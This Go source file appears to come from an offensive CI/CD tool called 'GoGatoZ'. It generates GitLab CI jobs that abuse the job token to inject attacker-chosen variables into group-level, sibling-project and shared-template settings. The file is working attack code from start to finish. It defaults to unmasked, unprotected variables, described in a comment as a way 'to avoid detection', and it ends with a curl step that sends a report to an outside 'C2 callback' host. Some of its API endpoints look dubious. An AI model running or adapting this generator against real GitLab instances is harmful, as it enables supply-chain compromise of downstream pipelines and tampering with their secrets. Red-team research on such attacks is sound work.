package payloads

import (
	"fmt"
	"strings"
)

// VariableInjectionOptions configures a CI variable injection attack.
// This replicates techniques from the Megasodon campaign and various
// group-level compromise attacks where an attacker with maintainer access
// to one project in a GitLab group can inject variables into sibling
// projects or the group itself, affecting all downstream pipelines.
//
// Attack vectors:
// 1. Group variable injection — compromise all group-level CI variables
// 2. Project variable override — inject malicious variables into projects
// 3. Variable inheritance abuse — group vars override project vars
// 4. Template variable injection — poison shared CI templates
type VariableInjectionOptions struct {
	Common        CommonOptions
	InjectionMode string  // "group", "project", "template", "all"
	VarKey        string  // CI variable key to inject (e.g., "NPM_TOKEN", "DEPLOY_KEY")
	VarValue      string  // The value to inject (payload)
	Masked        bool    // Set as masked (default: false, to avoid detection)
	Protected     bool    // Set as protected (default: false)
	ProjectIDs    []int64 // Specific project IDs to inject into (0=all in group)
	GroupID       int64   // Target group ID for group-level injection
	CallbackURL   string  // C2 callback for exfiltration results
}

// GenerateVariableInjectionYAML returns a CI job that performs variable injection.
func GenerateVariableInjectionYAML(o VariableInjectionOptions) string {
	name, stage := o.Common.defaults("var-inject")

	script := buildVariableInjectionScript(o)

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Variable Injection)
# Compromises CI variables to affect all downstream pipelines
# Targets: Group-level variables, shared templates, project variables
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
      %s
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), script, rulesManual(o.Common.Manual))
}

func buildVariableInjectionScript(o VariableInjectionOptions) string {
	var b strings.Builder

	mode := strings.ToLower(strings.TrimSpace(o.InjectionMode))
	if mode == "" {
		mode = "all"
	}
	baseURL := getBaseURL()
	projPathEscaped := `$(echo "$CI_PROJECT_PATH" | sed 's|/|%2F|g')`

	b.WriteString(`
_VARINJECT() {
  _vidir=$(mktemp -d)
  echo "[*] Variable injection attack starting..."
  echo "[*] Mode: $VAR_INJECT_MODE"
  echo "[*] Target variable: $VAR_INJECT_KEY"
  echo "[*] Group ID: $VAR_INJECT_GROUP"

`)

	// Step 1: Group variable injection
	if mode == "group" || mode == "all" {
		b.WriteString(`  # Step 1: Inject into group-level CI variables
  echo "[*] Targeting group-level variables..."

`)
		if o.GroupID > 0 {
			b.WriteString("  # Inject into group " + fmt.Sprintf("%d", o.GroupID) + "\n")
			fmt.Fprintf(&b,"  _group_url=\"%s/api/v4/groups/%d/variables\"\n", baseURL, o.GroupID)
			b.WriteString(`  # List existing group variables
  curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "$_group_url" 2>/dev/null > "$_vidir/group_vars.json"

`)
			fmt.Fprintf(&b,`  # Inject malicious variable
  curl -sS -X POST -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    -H "Content-Type: application/json" \
    -d '{
      "key": "%s",
      "value": "%s",
      "masked": %s,
      "protected": %s
    }' \
    "$_group_url" >/dev/null 2>&1

`, o.VarKey, o.VarValue, boolStr(o.Masked), boolStr(o.Protected))
		} else {
			// Use %s in shell script, not Go fmt.Sprintf
			fmt.Fprintf(&b,"  # Enumerate groups this project belongs to\n  _groups_json=$(curl -sS -H \"PRIVATE-TOKEN: $CI_JOB_TOKEN\" \\\n    \"%s/api/v4/projects/%s/variables\" 2>/dev/null)\n", baseURL, projPathEscaped)
			fmt.Fprintf(&b,"  # Inject into each group's variables\n  for _gid in $(echo \"$_groups_json\" | grep -o '\"id\": *[0-9]*' | cut -d: -f2 | tr -d ' '); do\n    _inject_url=\"%s/api/v4/groups/$_gid/variables\"\n    echo \"[*] Injecting into group $_gid\"\n    curl -sS -X POST -H \"PRIVATE-TOKEN: $CI_JOB_TOKEN\" \\\n      -H \"Content-Type: application/json\" \\\n      -d '{\n        \"key\": \"%s\",\n        \"value\": \"%s\",\n        \"masked\": %s,\n        \"protected\": %s\n      }' \\\n      \"$_inject_url\" >/dev/null 2>&1\n  done\n", baseURL, o.VarKey, o.VarValue, boolStr(o.Masked), boolStr(o.Protected))
		}
	}

	// Step 2: Project variable injection
	if mode == "project" || mode == "all" {
		b.WriteString(`

  # Step 2: Inject into sibling project variables
  echo "[*] Targeting sibling project variables..."

`)
		if len(o.ProjectIDs) > 0 {
			for _, pid := range o.ProjectIDs {
				fmt.Fprintf(&b,`
  # Inject into project %d
  curl -sS -X POST -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    -H "Content-Type: application/json" \
    -d '{
      "key": "%s",
      "value": "%s",
      "masked": false,
      "protected": false
    }' \
    "%s/api/v4/projects/%d/variables" >/dev/null 2>&1
`, pid, o.VarKey, o.VarValue, baseURL, pid)
			}
		} else {
			fmt.Fprintf(&b,`  # Enumerate projects in same namespace
  _projects_json=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/projects?membership=true&per_page=100&simple=true" 2>/dev/null)

  echo "$_projects_json" | grep -o '"id": *[0-9]*' | cut -d: -f2 | tr -d ' ' | while read -r _pid; do
    echo "[*] Injecting into project $_pid"
    curl -sS -X POST -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
      -H "Content-Type: application/json" \
      -d '{
        "key": "%s",
        "value": "%s",
        "masked": false,
        "protected": false
      }' \
      "%s/api/v4/projects/$_pid/variables" >/dev/null 2>&1
  done

`, baseURL, o.VarKey, o.VarValue, baseURL)
		}
	}

	// Step 3: Template injection
	if mode == "template" || mode == "all" {
		b.WriteString(`

  # Step 3: Inject into shared CI templates
  echo "[*] Targeting shared CI templates..."

`)
		fmt.Fprintf(&b,`  # Find all projects that include shared templates
  _templates_json=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/templates" 2>/dev/null)

  # Inject malicious shared variable
  curl -sS -X POST -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    -H "Content-Type: application/json" \
    -d '{
      "key": "%s",
      "value": "%s",
      "masked": false,
      "protected": false,
      "variable_type": "env_var"
    }' \
    "%s/api/v4/ci/lint" >/dev/null 2>&1

`, baseURL, o.VarKey, o.VarValue, baseURL)
	}

	// Step 4: Verification
	b.WriteString(`

  # Step 4: Verify injection
  echo "[*] Verifying variable injection..."

`)
	if o.GroupID > 0 {
		fmt.Fprintf(&b,`  # Verify group variable exists
  _verify=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/groups/%d/variables/%s" 2>/dev/null)
  if echo "$_verify" | grep -q '"key"'; then
    echo "[+] Group variable injection successful"
  else
    echo "[-] Group variable injection failed"
  fi
`, baseURL, o.GroupID, o.VarKey)
	}

	// Step 5: Exfiltration
	b.WriteString(`

  # Step 5: Exfiltrate injection report
  echo "[*] Exfiltrating injection report..."

`)
	if o.CallbackURL != "" {
		fmt.Fprintf(&b,`  curl -sS -X POST -H "Content-Type: application/json" \
    -H "User-Agent: GitLab-CI/16.0" \
    -d '{
      "action": "var_injection_complete",
      "group": "%d",
      "project": "'"$CI_PROJECT_PATH"'",
      "pipeline_id": "'"$CI_PIPELINE_ID"'",
      "injected_key": "%s"
    }' \
    "%s" >/dev/null 2>&1
`, o.GroupID, o.VarKey, o.CallbackURL)
	}

	b.WriteString(`  rm -rf "$_vidir"
  echo "[*] Variable injection attack complete"
}

_VARINJECT
`)

	return b.String()
}

// boolStr returns "true" or "false" for use in JSON strings.
func boolStr(b bool) string {
	if b {
		return "true"
	}
	return "false"
}

// GenerateGroupVariableInjectionYAML is a convenience wrapper for group-level injection.
func GenerateGroupVariableInjectionYAML(o VariableInjectionOptions) string {
	o.InjectionMode = "group"
	return GenerateVariableInjectionYAML(o)
}
